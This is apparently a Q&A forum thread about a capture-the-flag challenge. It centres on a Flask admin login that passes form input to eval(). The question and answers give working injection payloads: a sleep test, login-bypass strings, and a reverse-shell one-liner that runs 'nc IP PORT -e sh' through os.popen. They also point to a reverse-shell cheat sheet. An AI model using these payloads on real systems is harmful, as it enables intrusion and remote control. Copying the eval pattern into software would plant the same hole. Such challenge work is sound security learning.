1

So, as part of a challenge I found the following piece of code on a template of an opensource site:

@app.route("/admin", methods=['GET', 'POST'])
def admin():
    username = getUsernameFromSecureStorage() or "admin"
    passwd = getPasswordFromSecureStorage()
    if session.get('loggedin', False):
        return render_template('admin_page.html')
    else:
        if request.method == 'POST':
            if eval("'" + request.form['pass'] + "' == passwd"):
                session['loggedin'] = True
                return redirect(request.headers['referer'], code=302)
            else:
                return render_template('admin.html', msg="Login failed")
        return render_template('admin.html', msg="Welcome to the admin page")

I know for a fact that there is a python command injection here, as I was able to execute a sleep function using the following payload in the password field:

'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

But in case of trying to bypass the login or getting a reverse shell, there has been no luck yet.

Grateful for any suggestions.

TeSteR
  • 31
  • 3

3 Answers3

1

Thank you so much for the help with bypassing the password field by using

' or True or '

Another way is:

1==1'or'2

Main thing is that the statement had to evaluate to always being True.

As for the reverse shell, was pretty easy, especially when I found out that there's no bash on the server So this is what was needed:

'+__import__("os").popen("nc IP PORT -e sh").read()+'

Thank you all for the help!

TeSteR
  • 31
  • 3
-2

Maybe take a look here. It's a pretty neat cheat sheet for Reverse Shells, and there are plenty of python examples.

I'm sure you can find anything in there!

EDIT:
I dont have a working reverse shell yet, but bypassing login should be possible with "' == '' or '" as password.

example.py:

passwd = "aa"
evil_code = "' == '' or '"
if eval("'" + evil_code + "' == passwd"):
    print("success")
else:
    print("no success")
noah
  • 312
  • 2
  • 13
  • Unfortunately link-only answers are discouraged on Stack Overflow. – AKX Oct 20 '22 at 09:49
  • I'm currently working on some example code – noah Oct 20 '22 at 10:00
  • 2
    While this link may answer the question, it is better to include the essential parts of the answer here and provide the link for reference. Link-only answers can become invalid if the linked page changes. - [From Review](/review/low-quality-posts/32988644) – Donald Duck Oct 20 '22 at 10:48
  • @DonaldDuck Im still relatively new to this site, sorry. I improved my answer with some example code. – noah Oct 20 '22 at 10:55
-3

Normaly quit function is quiting your app so quit function might be helpfull.

You can try:

quit()
Sarper Makas
  • 99
  • 8